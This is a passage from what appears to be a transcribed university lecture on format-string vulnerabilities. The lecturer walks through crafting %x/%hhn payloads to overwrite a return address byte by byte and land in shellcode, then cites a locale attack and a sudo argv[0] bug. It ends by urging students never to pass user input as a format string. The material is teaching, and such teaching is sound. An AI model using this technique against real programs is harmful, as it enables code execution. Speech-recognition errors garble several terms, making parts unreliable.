ca, f5. So, that means to get to x ff, I'm going to take probably enough time to answer this correctly, because I want to finish this stuff. It doesn't make sense to come back a little later. So, immediately, I'll record it. So, if we put something that says, so we know we're at 16 bytes of output, we know we want to get to ff, we do simple substitution. That says we need 239 characters of output. So, we can use a percent 239x, right before we do a percent, let's see, it's going to be a percent, two dollar sign hhn, to write out the value ff at that memory location that we want. So, let's look at this. So, we can see that our format is the same. So, we have to address the one we want to write to, 4b's, 4c's, 4d's. So, at this point in the output, we have output 16 bytes. Then we do percent 239x, which can output another 239 character. So, 239 plus 16 should be 255. And then we do a percent two dollar sign hhn, to write out one single byte of ff at that location. So, we can do this, we can do the gp run. We'll say we get a single illegal instruction, because instead of trying to go to 080483 ff, what's the problem here? Which byte do we overwrite? Do we overwrite with the right value? Yes, do we overwrite with the right byte? No, because we changed the least significant byte, we wanted the ff to be the most significant byte. So, if we add three, this should be three, right? 8, 9, a, b. So, we're going to move three bytes up from where we were writing to, right? So, instead of writing to the least significant byte, we want to write to the most significant byte. Now, we run this again, and we should see, ah, so there we go, yeah. We've received a segmentation fault at ff048382. So, perfect, we've controlled the first byte to put it to ff, and we wanted ff, ff, something, something, something, something. So, the second ff is really easy to get, right? Because how many characters have any outputs so far? 556. Still, well, 255. 255. Yeah, still 255. So, now if we just change, if we change to the next four bytes here, instead of c's, or instead of b's, we're going to put 080497ad, or, sorry, da. So, it's one byte below db. So, this should be the second most significant byte. Because we haven't, remember, percent n writes out, it doesn't output anything. So, the total number of characters we've output is 255. Now, here, when we run this, we now see we've controlled bf, ff, da4, b. So, we've controlled the first two bytes. So, we're at here. This is the inside of f clothes. We have ff, ff, da4, 6. We want ff, ff, fc, right, c, a, f5, so I got lost in the s. So, then, how do we get the counter to go from ff to ca? Did we screw up? We can overflow it, yeah. Because it's only going to run out of bytes. So, even if we output more than 256, it's only going to write out the least significant number of in those bytes that we output, or these characters that we output. So, we're going to change from ff to ca, and it has a great wraparound. So, we're going to write ff. So, to get back to zero, we need one byte. We need to add to that x, ca, and that gives us 203. So, now we can actually do %239x. So, this gets us to ff. We print out the second one. We then print out the third memory locate. Sorry, we do %203x, which is going to change, which is going to wrap around the counter so we get to ca, and then we're going to do a %4 dollar sign, hhn, which is going to output what was all c's, and is now 080497d9, which is one below the da. So, this should overwrite this byte here, and change this da to ca. But actually, when I ran this, it worked. And why? You said you're not sledding. Not sledding. That's awesome. I'm going to get it exactly on my shellcode. I think this example of my not sled was more than 256 bytes. So, I didn't need this at all. So, I was able to come in there. So, yeah, this runs, everything works. There was an attack that was very similar to this example based on called a locale attack. And so, in your shell, you can change your locale to be a different value, like language equals the it is for capital IT. And you could use a huge percent string to output memory of this locale program. Also, there's actually another really recent vulnerability from like 2014 of the sudo command. So, sudo had a printf vulnerability on RV0. So, you could exec it and pass in your own RV0 value of format strings, and it would cause and trigger a format string vulnerability. That was in there for a long time. Like it was just recently found. So, people could use this vulnerability to get extra information in sudo. So, never ever, ever, ever, ever, ever, pass user input as the format to a format string. That's it. This is bad, this is good. It seems silly, because it seems like such an easy thing to get right, and yet it happens again and again, and it's still super relevant. Now we've got kind of all the way up of over the cover on different types of vulnerabilities. There's stuff, if you want to go deeper, there's stuff in the slides that I skipped over that are relevant, and we have to do stuff to get a bunch of stuff, so. Next on Monday, we're going to advance memory protections, and we'll talk about return of the sea, and ROF, and ASLR, and stack memories, and all this kind of cool stuff. Yeah. So, after this, do we have enough to finish things up? Yeah. All the way up. Getting level 16 requires a lot of manual work.